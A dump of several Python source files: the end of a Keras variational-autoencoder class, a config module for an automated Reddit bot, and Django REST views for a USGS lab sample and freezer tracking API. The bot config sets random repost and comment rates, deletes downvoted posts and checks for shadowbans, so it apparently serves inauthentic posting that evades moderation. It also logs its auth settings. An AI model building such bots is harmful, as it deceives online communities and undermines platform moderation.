vae_d2 = Conv2DTranspose(filters = CONV_T_FILTERS[1], kernel_size = CONV_T_KERNEL_SIZES[1] , strides = CONV_T_STRIDES[1], activation=CONV_T_ACTIVATIONS[1], name='deconv_layer_2')(vae_d1)\n vae_d3 = Conv2DTranspose(filters = CONV_T_FILTERS[2], kernel_size = CONV_T_KERNEL_SIZES[2] , strides = CONV_T_STRIDES[2], activation=CONV_T_ACTIVATIONS[2], name='deconv_layer_3')(vae_d2)\n vae_d4 = Conv2DTranspose(filters = CONV_T_FILTERS[3], kernel_size = CONV_T_KERNEL_SIZES[3] , strides = CONV_T_STRIDES[3], activation=CONV_T_ACTIVATIONS[3], name='deconv_layer_4')(vae_d3)\n \n\n #### MODELS\n\n \n vae_encoder = Model(vae_x, [vae_z_mean, vae_z_log_var, vae_z], name = 'encoder')\n vae_decoder = Model(vae_z_input, vae_d4, name = 'decoder')\n\n vae_full = VAEModel(vae_encoder, vae_decoder, 10000)\n\n opti = Adam(lr=LEARNING_RATE)\n vae_full.compile(optimizer=opti)\n \n return (vae_full,vae_encoder, vae_decoder)\n\n def set_weights(self, filepath):\n self.full_model.load_weights(filepath)\n\n def train(self, data):\n\n self.full_model.fit(data, data,\n shuffle=True,\n epochs=1,\n batch_size=BATCH_SIZE)\n \n def save_weights(self, filepath):\n self.full_model.save_weights(filepath)\n"} {"ext": "py", "sha": "1a2fb744396bccd3b48b313776264cdfe8dd0a7c", "content": "from utils import prefer_envar\nfrom logs.logger import log\nfrom logs.log_utils import log_json\nfrom config.reddit.reddit_sub_lists import REDDIT_APPROVED_SUBS\nfrom config.reddit.config_gen import config_gen\nimport sys\nimport json\nimport os\n\nif os.path.isfile('config.json'):\n file = open(\"config.json\", \"r\")\n AUTH = prefer_envar(json.loads(file.read()))\nelse:\n AUTH = prefer_envar({\n # app creds\n \"reddit_client_id\":\"\",\n \"reddit_client_secret\":\"\",\n # reddit account creds\n \"reddit_username\":\"\",\n \"reddit_password\":\"\",\n })\n\nfor envar in AUTH:\n if AUTH[envar] == \"\":\n # reddit auth not configured correctly. \n # instruct user to generate a .env file\n config_gen()\n\nlog.info(f\"REDDIT AUTH CONFIG:\\n {log_json(AUTH)}\")\n\nCONFIG = prefer_envar({\n \"reddit_crosspost_enabled\": False,\n # the chance the bot will repost a post\n \"reddit_post_chance\": 0.005,\n # the chance the bot will make a comment\n \"reddit_comment_chance\": 0.005,\n # the chance the bot will reply to a comment\n # otherwise it will reply to a post\n \"reddit_reply_to_comment\": 0.002,\n # chance the bot will remove poor performing\n # posts and comments\n \"reddit_remove_low_scores\": 0.002,\n # posts/comments that get downvoted to this score will be deleted\n \"reddit_low_score_threshold\": 0,\n # chance to check if the bot is shadowbanned, \n # and shut down the script automatically\n \"reddit_shadowban_check\": 0.002,\n # list of subreddits for the bot to use\n \"reddit_sub_list\": REDDIT_APPROVED_SUBS,\n # bot schedules. all times are UTC\n # add the schedule number to the array\n # and the bot will run within that time range\n # leave the array empty for no schedule: []\n # 1 - 7am-10am ((7,00),(10,00))\n # 2 - 10am-2pm ((10,00),(14,00))\n # 3 - 2pm-6pm ((14,00),(18,00))\n # 4 - 6pm-10pm ((18,00),(22,00))\n # 5 - 10pm-2am ((22,00),(2,00))\n \"reddit_sleep_schedule\": [2, 4]\n})\n\nlog.info(f\"REDDIT CONNFIG:\\n {log_json(CONFIG)}\")\n"} {"ext": "py", "sha": "1a2fba1a886ca8bda4185af80c3157d5a5d9f4a5", "content": "from django.http import JsonResponse\nfrom django.utils import timezone\nfrom django.contrib.sessions.models import Session\nfrom rest_framework import views, viewsets, authentication\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.exceptions import APIException\nfrom liliapi.serializers import *\nfrom liliapi.models import *\nfrom liliapi.permissions import *\nfrom liliapi.paginations import *\nfrom liliapi.authentication import *\nfrom liliapi.tasks import *\n\n\n########################################################################################################################\n#\n# copyright: 2017 WiM - USGS\n# authors: Aaron Stephenson USGS WiM (Web Informatics and Mapping)\n#\n# In Django, a view is what takes a Web request and returns a Web response. The response can be many things, but most\n# of the time it will be a Web page, a redirect, or a document. In this case, the response will almost always be data\n# in JSON format.\n#\n# All these views are written as Class-Based Views (https://docs.djangoproject.com/en/1.11/topics/class-based-views/)\n# because that is the paradigm used by Django Rest Framework (http://www.django-rest-framework.org/api-guide/views/)\n# which is the toolkit we used to create web services in Django.\n#\n#\n########################################################################################################################\n\n\nLIST_DELIMETER = settings.LIST_DELIMETER\n\n\n######\n#\n# Abstract Base Classes\n#\n######\n\n\nclass HistoryViewSet(viewsets.ModelViewSet):\n \"\"\"\n This class will automatically assign the User ID to the created_by and modified_by history fields when appropriate\n \"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n pagination_class = StandardResultsSetPagination\n\n def perform_create(self, serializer):\n serializer.save(created_by=self.request.user, modified_by=self.request.user)\n\n def perform_update(self, serializer):\n serializer.save(modified_by=self.request.user)\n\n # override the default pagination to allow disabling of pagination\n def paginate_queryset(self, *args, **kwargs):\n if self.request and 'paginate' in self.request.query_params:\n return super().paginate_queryset(*args, **kwargs)\n return None\n\n######\n#\n# Samples\n#\n######\n\n\nclass SampleViewSet(HistoryViewSet):\n serializer_class = SampleSerializer\n\n def get_serializer_class(self):\n if self.request and 'slim' in self.request.query_params:\n return SampleSlimSerializer\n else:\n return SampleSerializer\n\n @action(detail=False)\n def finalsamplemeanconcentrations(self, request):\n queryset = Sample.objects.prefetch_related('finalsamplemeanconcentrations').distinct()\n query_params = self.request.query_params\n # filter by sample IDs, exact list\n sample = query_params.get('sample', None)\n if sample is not None:\n if LIST_DELIMETER in sample:\n sample_list = sample.split(LIST_DELIMETER)\n queryset = queryset.filter(id__in=sample_list)\n else:\n queryset = queryset.filter(id__exact=sample)\n # filter by target IDs, exact list\n target = query_params.get('target', None)\n target_list = []\n if target is not None:\n if LIST_DELIMETER in target:\n target_list = target.split(LIST_DELIMETER)\n queryset = queryset.filter(finalsamplemeanconcentrations__target__in=target_list)\n else:\n target_list = [target]\n queryset = queryset.filter(finalsamplemeanconcentrations__target__exact=target)\n\n # recalc reps validity\n for sample in queryset:\n fsmcs = FinalSampleMeanConcentration.objects.filter(sample=sample.id, target__in=target_list)\n for fsmc in fsmcs:\n recalc_reps('FinalSampleMeanConcentration', sample.id, target=fsmc.target.id, recalc_rep_conc=False)\n\n # start building up the response object\n resp = []\n for sample in queryset:\n sample_target_list = [int(target) for target in target_list]\n item = {\n \"id\": sample.id,\n \"collaborator_sample_id\": sample.collaborator_sample_id,\n \"collection_start_date\": sample.collection_start_date,\n \"final_sample_mean_concentrations\": []\n }\n fsmcs = list(FinalSampleMeanConcentration.objects.filter(sample=sample.id))\n for fsmc in fsmcs:\n # attempt to find the matching target in the fsmc list\n try:\n sample_target_index = sample_target_list.index(fsmc.target.id)\n # pop the matching fsmc target from its list so that we eventually end up with an empty list,\n # or a list of extraneous targets\n sample_target_list.pop(sample_target_index)\n\n # start building up the nested response object\n item[\"final_sample_mean_concentrations\"].append({\n \"target\": fsmc.target.id,\n \"target_string\": fsmc.target.name,\n \"final_sample_mean_concentration\": fsmc.final_sample_mean_concentration\n })\n # no matching target was found in the fsmc list\n except ValueError:\n # do not include this fsmc in the response because its target was not requested\n continue\n # now list out the other targets that were requested but do not exist for this sample\n for extraneous_target in sample_target_list:\n # start building up the nested response object\n target_name = list(Target.objects.filter(id=extraneous_target).values_list('name', flat=True))\n item[\"final_sample_mean_concentrations\"].append({\n \"target\": extraneous_target,\n \"target_string\": target_name[0],\n \"final_sample_mean_concentration\": \"N/A\"\n })\n resp.append(item)\n\n return Response(resp)\n\n @action(detail=False)\n def get_count(self, request):\n # Sample.objects.filter(matrix__in=matrix_list).count()\n query_params = self.request.query_params\n return Response({\"count\": self.build_queryset(query_params).count()})\n\n @action(detail=False)\n def get_sampler_names(self, request):\n sampler_names = set(list(Sample.objects.values_list('sampler_name', flat=True)))\n return Response({\"sampler_names\": sampler_names})\n\n @action(detail=False)\n def get_recent_pegnegs(self, request):\n pegneg_record_type = RecordType.objects.filter(id=2).first()\n recent_pegnegs = Sample.objects.filter(record_type=pegneg_record_type).order_by('-id')[:20]\n return Response(self.serializer_class(recent_pegnegs, many=True).data)\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n query_params = self.request.query_params\n return self.build_queryset(query_params)\n\n # build a queryset using query_params\n # NOTE: this is being done in its own method to adhere to the DRY Principle\n def build_queryset(self, query_params):\n queryset = Sample.objects.all()\n # filter by sample IDs, exact list\n sample = query_params.get('id', None)\n if sample is not None:\n if LIST_DELIMETER in sample:\n sample_list = sample.split(LIST_DELIMETER)\n queryset = queryset.filter(id__in=sample_list)\n else:\n queryset = queryset.filter(id__exact=sample)\n # filter by sample ID, range\n from_sample = query_params.get('from_id', None)\n to_sample = query_params.get('to_id', None)\n if from_sample is not None and to_sample is not None:\n # the filter below using __range is value-inclusive\n queryset = queryset.filter(id__range=(from_sample, to_sample))\n elif to_sample is not None:\n queryset = queryset.filter(id__lte=to_sample)\n elif from_sample is not None:\n queryset = queryset.filter(id__gte=from_sample)\n # filter by study ID, exact list\n study = query_params.get('study', None)\n if study is not None:\n if LIST_DELIMETER in study:\n study_list = study.split(LIST_DELIMETER)\n queryset = queryset.filter(study__in=study_list)\n else:\n queryset = queryset.filter(study__exact=study)\n # filter by collection_start_date, range\n from_collection_start_date = query_params.get('from_collection_start_date', None)\n to_collection_start_date = query_params.get('to_collection_start_date', None)\n if from_collection_start_date is not None and to_collection_start_date is not None:\n # the filter below using __range is value-inclusive\n queryset = queryset.filter(collection_start_date__range=(\n from_collection_start_date, to_collection_start_date))\n elif to_collection_start_date is not None:\n queryset = queryset.filter(collection_start_date__lte=to_collection_start_date)\n elif from_collection_start_date is not None:\n queryset = queryset.filter(collection_start_date__gte=from_collection_start_date)\n # filter by collaborator_sample_id, exact list\n collaborator_sample_id = query_params.get('collaborator_sample_id', None)\n if collaborator_sample_id is not None:\n if LIST_DELIMETER in collaborator_sample_id:\n collaborator_sample_id_list = collaborator_sample_id.split(LIST_DELIMETER)\n queryset = queryset.filter(collaborator_sample_id__in=collaborator_sample_id_list)\n else:\n queryset = queryset.filter(collaborator_sample_id__exact=collaborator_sample_id)\n # filter by sample type, exact list\n sample_type = query_params.get('sample_type', None)\n if sample_type is not None:\n if LIST_DELIMETER in sample_type:\n sample_type_list = sample_type.split(LIST_DELIMETER)\n queryset = queryset.filter(sample_type__in=sample_type_list)\n else:\n queryset = queryset.filter(sample_type__exact=sample_type)\n # filter by matrix, exact list\n matrix = query_params.get('matrix', None)\n if matrix is not None:\n if LIST_DELIMETER in matrix:\n matrix_list = matrix.split(LIST_DELIMETER)\n queryset = queryset.filter(matrix__in=matrix_list)\n else:\n queryset = queryset.filter(matrix__exact=matrix)\n # filter by record_type, exact list\n record_type = query_params.get('record_type', None)\n if record_type is not None:\n if LIST_DELIMETER in record_type:\n record_type_list = record_type.split(LIST_DELIMETER)\n queryset = queryset.filter(record_type__in=record_type_list)\n else:\n queryset = queryset.filter(record_type__exact=record_type)\n # filter by peg_neg, exact list\n peg_neg = query_params.get('peg_neg', None)\n if peg_neg is not None:\n if LIST_DELIMETER in peg_neg:\n peg_neg_list = peg_neg.split(LIST_DELIMETER)\n queryset = queryset.filter(peg_neg__in=peg_neg_list)\n else:\n queryset = queryset.filter(peg_neg__exact=peg_neg)\n return queryset\n\n\nclass AliquotViewSet(HistoryViewSet):\n queryset = Aliquot.objects.all()\n serializer_class = AliquotCustomSerializer\n\n @action(detail=False)\n def get_location(self, request):\n # get the freezer from the request query\n freezer = request.query_params.get('freezer', None)\n # get the rack from the request query\n rack = request.query_params.get('rack', None)\n # get the box from the request query\n box = request.query_params.get('box', None)\n\n # if a freezer was included in the query, use it, otherwise default to the first freezer\n freezer = freezer if freezer else 1\n\n # find all aliquots in the requested rack and/or box (and freezer)\n if rack and box:\n queryset = Aliquot.objects.filter(freezer_location__freezer=freezer,\n freezer_location__rack=rack, freezer_location__box=box)\n elif rack:\n queryset = Aliquot.objects.filter(freezer_location__freezer=freezer, freezer_location__rack=rack)\n elif box:\n queryset = Aliquot.objects.filter(freezer_location__freezer=freezer, freezer_location__box=box)\n else:\n queryset = Aliquot.objects.none()\n\n return Response(AliquotSlimSerializer(queryset, many=True).data)\n\n @action(methods=['post'], detail=False)\n def bulk_delete(self, request):\n # ensure submitted data is a list of only IDs or a list of only aliquot_strings (SampleID-AliquotNumber)\n if all([str(item).isdigit() for item in request.data]):\n aliquots = Aliquot.objects.filter(id__in=request.data)\n if len(aliquots) != len(request.data):\n aliquot_ids = [aliquot.id for aliquot in aliquots]\n invalid_ids = list(set(request.data).difference(aliquot_ids))\n message = \"Invalid request. No aliquots deleted. The following submitted values could not be found\"\n message += \" in the database: \" + str(invalid_ids)\n return JsonResponse({\"message\": message}, status=400)\n else:\n freezer_location_ids = [aliquot.freezer_location_id for aliquot in aliquots]\n Aliquot.objects.filter(id__in=request.data).delete()\n FreezerLocation.objects.filter(id__in=freezer_location_ids).delete()\n return JsonResponse({\"message\": \"Aliquots deleted.\"}, status=200)\n elif all([isinstance(item, str) and '-' in item for item in request.data]):\n aliquot_ids = []\n freezer_location_ids = []\n invalid_ids = []\n for item in request.data:\n item_split = item.split('-')\n aliquot = Aliquot.objects.filter(sample=item_split[0], aliquot_number=item_split[1]).first()\n if aliquot:\n aliquot_ids.append(aliquot.id)\n freezer_location_ids.append(aliquot.freezer_location_id)\n else:\n invalid_ids.append(item)\n if len(invalid_ids) > 0:\n message = \"Invalid request. No aliquots deleted. The following submitted values could not be found\"\n message += \" in the database: \" + str(invalid_ids)\n return JsonResponse({\"message\": message}, status=400)\n else:\n Aliquot.objects.filter(id__in=aliquot_ids).delete()\n FreezerLocation.objects.filter(id__in=freezer_location_ids).delete()\n return JsonResponse({\"message\": \"Aliquots deleted.\"}, status=200)\n else:\n message = \"Invalid request. Submitted data must be a list/array of aliquot IDs\"\n message += \"or sample_id-aliquot_number combinations (e.g., '1001-3')\"\n return JsonResponse({\"message\": message}, status=400)\n\n def get_serializer_class(self):\n if not isinstance(self.request.data, list):\n return AliquotSerializer\n else:\n return self.serializer_class\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list) and len(data) > 0 and 'aliquot_count' in data[0]:\n kwargs['many'] = True\n\n return super(AliquotViewSet, self).get_serializer(*args, **kwargs)\n\n\nclass SampleTypeViewSet(HistoryViewSet):\n queryset = SampleType.objects.all()\n serializer_class = SampleTypeSerializer\n\n\nclass MatrixViewSet(HistoryViewSet):\n queryset = Matrix.objects.all()\n serializer_class = MatrixSerializer\n\n\nclass FilterTypeViewSet(HistoryViewSet):\n queryset = FilterType.objects.all()\n serializer_class = FilterTypeSerializer\n\n\nclass StudyViewSet(HistoryViewSet):\n queryset = Study.objects.all()\n serializer_class = StudySerializer\n\n\nclass UnitViewSet(HistoryViewSet):\n queryset = Unit.objects.all()\n serializer_class = UnitSerializer\n\n\n######\n#\n# Freezer Locations\n#\n######\n\n\nclass FreezerLocationViewSet(HistoryViewSet):\n queryset = FreezerLocation.objects.all()\n serializer_class = FreezerLocationSerializer\n\n @action(methods=['get'], detail=False)\n def get_next_available(self, request):\n # get the first empty box in the any freezer\n first_empty_box = FreezerLocation.objects.get_first_empty_box()\n if first_empty_box is None:\n first_empty_box = \"There are no more empty boxes in this freezer!\"\n # get the study_id from the request query\n study_id = request.query_params.get('study', None)\n last_spot = FreezerLocation.objects.get_last_occupied_spot(study_id)\n # if a last spot is found look up the next available spot\n if last_spot is not None:\n next_spot = FreezerLocation.objects.get_next_available_spot(last_spot)\n # if there is a next spot\n if next_spot is not None:\n # start building the full response object\n resp = next_spot\n\n # determine maximum available spots in a box in this freezer (for an empty box)\n rows_in_box = last_spot.freezer.rows\n spots_in_row = last_spot.freezer.spots\n spots_in_box = rows_in_box * spots_in_row\n\n # ensure next spot and next empty box are not the same\n get_second_empty_box = True if next_spot['available_spots_in_box'] == spots_in_box else False\n next_empty_box = FreezerLocation.objects.get_next_empty_box(last_spot, get_second_empty_box)\n\n # then add the next empty box to the response object\n resp.update({\"next_empty_box\": next_empty_box})\n # no next spot was found\n else:\n resp = {\"not_found\": \"There are no more empty boxes in this freezer!\"}\n # otherwise no last spot has been found\n else:\n # if a study_id was included in the query, mention it in the response\n if study_id is not None:\n study = Study.objects.filter(id=study_id).first()\n message = \"No aliquots for \"\n if study is not None:\n message += study.name + \" \"\n message += \"(Study ID #\" + str(study_id) + \") are stored in any freezer.\"\n # otherwise inform the user that no freezer locations have been used\n else:\n message = \"No aliquots are stored in any freezer.\"\n resp = {\"not_found\": message}\n resp.update({\"next_empty_box\": first_empty_box})\n return Response(resp)\n\n\nclass FreezerViewSet(HistoryViewSet):\n queryset = Freezer.objects.all()\n serializer_class = FreezerSerializer\n\n\n######\n#\n# Final Sample Values\n#\n######\n\n\nclass FinalConcentratedSampleVolumeViewSet(HistoryViewSet):\n serializer_class = FinalConcentratedSampleVolumeSerializer\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n queryset = FinalConcentratedSampleVolume.objects.all()\n # filter by sample ID, exact list\n sample = self.request.query_params.get('sample', None)\n if sample is not None:\n sample_list = sample.split(',')\n queryset = queryset.filter(sample__in=sample_list)\n return queryset\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list):\n kwargs['many'] = True\n\n return super(FinalConcentratedSampleVolumeViewSet, self).get_serializer(*args, **kwargs)\n\n\nclass ConcentrationTypeViewSet(HistoryViewSet):\n queryset = ConcentrationType.objects.all()\n serializer_class = ConcentrationTypeSerializer\n\n\nclass FinalSampleMeanConcentrationViewSet(HistoryViewSet):\n serializer_class = FinalSampleMeanConcentrationSerializer\n\n @action(detail=False)\n def summary_statistics(self, request):\n sample = request.query_params.get('sample', None)\n target = request.query_params.get('target', None)\n statistic = request.query_params.get('statistic', None)\n report_type = ReportType.objects.filter(id=2).first()\n status = Status.objects.filter(id=1).first()\n report_file = ReportFile.objects.create(\n report_type=report_type, status=status, created_by=request.user, modified_by=request.user)\n task = generate_results_summary_report.delay(sample, target, statistic, report_file.id, request.user.username)\n monitor_task.delay(task.id, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'), report_file.id)\n return JsonResponse({\"message\": \"Request for Results Summary Report received.\"}, status=200)\n\n @action(detail=False)\n def results(self, request):\n sample = request.query_params.get('sample', None)\n target = request.query_params.get('target', None)\n report_type = ReportType.objects.filter(id=3).first()\n status = Status.objects.filter(id=1).first()\n report_file = ReportFile.objects.create(\n report_type=report_type, status=status, created_by=request.user, modified_by=request.user)\n task = generate_individual_sample_report.delay(sample, target, report_file.id, request.user.username)\n monitor_task.delay(task.id, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'), report_file.id)\n return JsonResponse({\"message\": \"Request for Individual Sample Report received.\"}, status=200)\n\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n query_params = self.request.query_params\n return self.build_queryset(query_params)\n\n # build a queryset using query_params\n # NOTE: this is being done in its own method to adhere to the DRY Principle\n def build_queryset(self, query_params):\n queryset = FinalSampleMeanConcentration.objects.all()\n # filter by sample ID, exact list\n sample = query_params.get('sample', None)\n if sample is not None:\n sample_list = sample.split(',')\n queryset = queryset.filter(sample__in=sample_list)\n # filter by target ID, exact list\n target = query_params.get('target', None)\n if target is not None:\n target_list = target.split(',')\n queryset = queryset.filter(target__in=target_list)\n # filter by study ID, exact list\n study = query_params.get('study', None)\n if study is not None:\n study_list = sample.split(',')\n queryset = queryset.filter(sample__study__in=study_list)\n # filter by collection_start_date, exact list\n collection_start_date = query_params.get('collection_start_date', None)\n if collection_start_date is not None:\n collection_start_date_list = sample.split(',')\n queryset = queryset.filter(sample__collection_start_date__in=collection_start_date_list)\n # filter by collaborator_sample_id, exact list\n collaborator_sample_id = query_params.get('collaborator_sample_id', None)\n if collaborator_sample_id is not None:\n collaborator_sample_id_list = sample.split(',')\n queryset = queryset.filter(sample__collaborator_sample_id__in=collaborator_sample_id_list)\n\n # recalc reps validity\n for fsmc in queryset:\n recalc_reps('FinalSampleMeanConcentration', fsmc.sample.id, target=fsmc.target.id, recalc_rep_conc=False)\n\n return queryset\n\n # override the default GET method to recalc all child PCR Replicates first before the FSMC Select query\n def retrieve(self, request, *args, **kwargs):\n recalc_reps('FinalSampleMeanConcentration',\n self.get_object().sample.id, target=self.get_object().target.id, recalc_rep_conc=False)\n return super(FinalSampleMeanConcentrationViewSet, self).retrieve(request, *args, **kwargs)\n\n\n######\n#\n# Sample Groups\n#\n######\n\n\nclass SampleSampleGroupViewSet(HistoryViewSet):\n queryset = SampleSampleGroup.objects.all()\n serializer_class = SampleSampleGroupSerializer\n\n\nclass SampleGroupViewSet(HistoryViewSet):\n queryset = SampleGroup.objects.all()\n serializer_class = SampleGroupSerializer\n\n\n######\n#\n# Analyses\n#\n######\n\n\nclass SampleAnalysisBatchViewSet(HistoryViewSet):\n queryset = SampleAnalysisBatch.objects.all()\n serializer_class = SampleAnalysisBatchSerializer\n\n\nclass AnalysisBatchViewSet(HistoryViewSet):\n queryset = AnalysisBatch.objects.all()\n serializer_class = AnalysisBatchSerializer\n\n # override the default DELETE method to prevent deletion of an AnalysisBatch with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates = PCRReplicate.objects.filter(\n pcrreplicate_batch__extraction_batch__analysis_batch=self.get_object().id).exclude(cq_value__isnull=True)\n if any(nonnull_pcrreplicates):\n message = \"An Analysis Batch may not be deleted if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(AnalysisBatchViewSet, self).destroy(request, *args, **kwargs)\n\n\nclass AnalysisBatchDetailViewSet(HistoryViewSet):\n serializer_class = AnalysisBatchDetailSerializer\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n queryset = AnalysisBatch.objects.all()\n batch = self.request.query_params.get('id', None)\n if batch is not None:\n if LIST_DELIMETER in batch:\n batch_list = batch.split(',')\n queryset = queryset.filter(id__in=batch_list)\n else:\n queryset = queryset.filter(id__exact=batch)\n return queryset\n\n\nclass AnalysisBatchSummaryViewSet(HistoryViewSet):\n serializer_class = AnalysisBatchSummarySerializer\n\n @action(detail=False)\n def get_count(self, request):\n query_params = self.request.query_params\n return Response({\"count\": self.build_queryset(query_params).count()})\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n query_params = self.request.query_params\n return self.build_queryset(query_params)\n\n # build a queryset using query_params\n # NOTE: this is being done in its own method to adhere to the DRY Principle\n def build_queryset(self, query_params):\n study = self.request.query_params.get('study', None)\n if study is not None:\n queryset = AnalysisBatch.objects.prefetch_related('samples').all()\n else:\n queryset = AnalysisBatch.objects.all()\n # filter by batch ID, exact list\n batch = self.request.query_params.get('id', None)\n if batch is not None:\n if LIST_DELIMETER in batch:\n batch_list = batch.split(',')\n queryset = queryset.filter(id__in=batch_list)\n else:\n queryset = queryset.filter(id__exact=batch)\n # filter by batch ID, range\n from_batch = query_params.get('from_id', None)\n to_batch = query_params.get('to_id', None)\n if from_batch is not None and to_batch is not None:\n # the filter below using __range is value-inclusive\n queryset = queryset.filter(id__range=(from_batch, to_batch))\n elif to_batch is not None:\n queryset = queryset.filter(id__lte=to_batch)\n elif from_batch is not None:\n queryset = queryset.filter(id__gte=from_batch)\n # filter by study ID, exact list\n if study is not None:\n if LIST_DELIMETER in study:\n study_list = study.split(',')\n queryset = queryset.filter(samples__study__in=study_list).distinct()\n else:\n queryset = queryset.filter(samples__study__exact=study).distinct()\n return queryset\n\n\nclass AnalysisBatchTemplateViewSet(HistoryViewSet):\n queryset = AnalysisBatchTemplate.objects.all()\n serializer_class = AnalysisBatchTemplateSerializer\n\n\n######\n#\n# Extractions\n#\n######\n\n\nclass ExtractionMethodViewSet(HistoryViewSet):\n queryset = ExtractionMethod.objects.all()\n serializer_class = ExtractionMethodSerializer\n\n\nclass ExtractionBatchViewSet(HistoryViewSet):\n queryset = ExtractionBatch.objects.all()\n\n # override the default serializer_class if summary fields are requested\n def get_serializer_class(self):\n include_summary_fields = self.request.query_params.get('includeSummaryFields', None)\n if include_summary_fields is not None and include_summary_fields.lower() == 'true':\n return ExtractionBatchSummarySerializer\n else:\n return ExtractionBatchSerializer\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list):\n kwargs['many'] = True\n\n return super(ExtractionBatchViewSet, self).get_serializer(*args, **kwargs)\n\n # override the default DELETE method to prevent deletion of an ExtractionBatch with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates = PCRReplicate.objects.filter(\n pcrreplicate_batch__extraction_batch=self.get_object().id).exclude(cq_value__isnull=True)\n if any(nonnull_pcrreplicates):\n message = \"An Extraction Batch may not be deleted if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(ExtractionBatchViewSet, self).destroy(request, *args, **kwargs)\n\n # override the default PATCH method to allow bulk processing\n def patch(self, request, pk=None):\n request_data = JSONParser().parse(request)\n # if there is no pk, assume this is a bulk request\n if not pk:\n is_valid = True\n response_data = []\n valid_data = []\n response_errors = []\n for item in request_data:\n # ensure the id field is present, otherwise nothing can be updated\n if not item.get('id'):\n is_valid = False\n response_errors.append({\"id\": \"This field is required.\"})\n else:\n eb_id = item.pop('id')\n eb = ExtractionBatch.objects.filter(id=eb_id).first()\n item['modified_by'] = request.user\n\n # remove nulls coming from client (user not actually sending nulls, so no need to trigger recalcs)\n if 'ext_pos_rna_rt_cq_value' in item and item['ext_pos_rna_rt_cq_value'] is None:\n item.pop('ext_pos_rna_rt_cq_value')\n if 'ext_pos_dna_cq_value' in item and item['ext_pos_dna_cq_value'] is None:\n item.pop('ext_pos_dna_cq_value')\n\n if eb:\n serializer = self.get_serializer(eb, data=item, partial=True)\n # if this item is valid, temporarily hold it until all items are proven valid, then save all\n # if even one item is invalid, none will be saved, and the user will be returned the error(s)\n if serializer.is_valid():\n valid_data.append(serializer)\n else:\n is_valid = False\n response_errors.append(serializer.errors)\n else:\n is_valid = False\n message = \"No ExtractionBatch exists with this ID: \" + str(eb_id)\n response_errors.append({\"extractionbatch\": message})\n if is_valid:\n # now that all items are proven valid, save and return them to the user\n for item in valid_data:\n item.save()\n response_data.append(item.data)\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n # otherwise, if there is a pk, update the instance indicated by the pk\n else:\n rep = ExtractionBatch.objects.filter(id=pk).first()\n if rep:\n serializer = self.serializer_class(rep, data=request_data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\n else:\n message = \"No ExtractionBatch exists with this ID: \" + str(pk)\n return JsonResponse({\"extractionbatch\": message}, status=400)\n\n\nclass ReverseTranscriptionViewSet(HistoryViewSet):\n queryset = ReverseTranscription.objects.all()\n serializer_class = ReverseTranscriptionSerializer\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list):\n kwargs['many'] = True\n\n return super(ReverseTranscriptionViewSet, self).get_serializer(*args, **kwargs)\n\n # override the default DELETE method to prevent deletion of a ReverseTranscription with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates = PCRReplicate.objects.filter(\n pcrreplicate_batch__extraction_batch__reversetranscriptions=self.get_object().id).exclude(\n cq_value__isnull=True)\n if any(nonnull_pcrreplicates):\n message = \"A Reverse Transcription may not be deleted\"\n message += \" if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(ReverseTranscriptionViewSet, self).destroy(request, *args, **kwargs)\n\n # override the default PATCH method to allow bulk processing\n def patch(self, request, pk=None):\n request_data = JSONParser().parse(request)\n # if there is no pk, assume this is a bulk request\n if not pk:\n is_valid = True\n response_data = []\n valid_data = []\n response_errors = []\n for item in request_data:\n # ensure the id field is present, otherwise nothing can be updated\n if not item.get('id'):\n is_valid = False\n response_errors.append({\"id\": \"This field is required.\"})\n else:\n rt_id = item.pop('id')\n rt = ReverseTranscription.objects.filter(id=rt_id).first()\n if rt:\n serializer = self.serializer_class(rt, data=item, partial=True)\n # if this item is valid, temporarily hold it until all items are proven valid, then save all\n # if even one item is invalid, none will be saved, and the user will be returned the error(s)\n if serializer.is_valid():\n valid_data.append(serializer)\n else:\n is_valid = False\n response_errors.append(serializer.errors)\n else:\n is_valid = False\n response_errors.append(\n {\"reversetranscription\": \"No ReverseTranscription exists with this ID: \" + str(rt_id)})\n if is_valid:\n # now that all items are proven valid, save and return them to the user\n for item in valid_data:\n item.save()\n response_data.append(item.data)\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n # otherwise, if there is a pk, update the instance indicated by the pk\n else:\n rep = ReverseTranscription.objects.filter(id=pk).first()\n if rep:\n serializer = self.serializer_class(rep, data=request_data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\n else:\n return JsonResponse(\n {\"reversetranscription\": \"No ReverseTranscription exists with this ID: \" + str(pk)}, status=400)\n\n\nclass SampleExtractionViewSet(HistoryViewSet):\n queryset = SampleExtraction.objects.all()\n serializer_class = SampleExtractionSerializer\n\n @action(detail=False)\n def inhibition_report(self, request):\n sample = request.query_params.get('sample', None)\n report_type = ReportType.objects.filter(id=1).first()\n status = Status.objects.filter(id=1).first()\n report_file = ReportFile.objects.create(\n report_type=report_type, 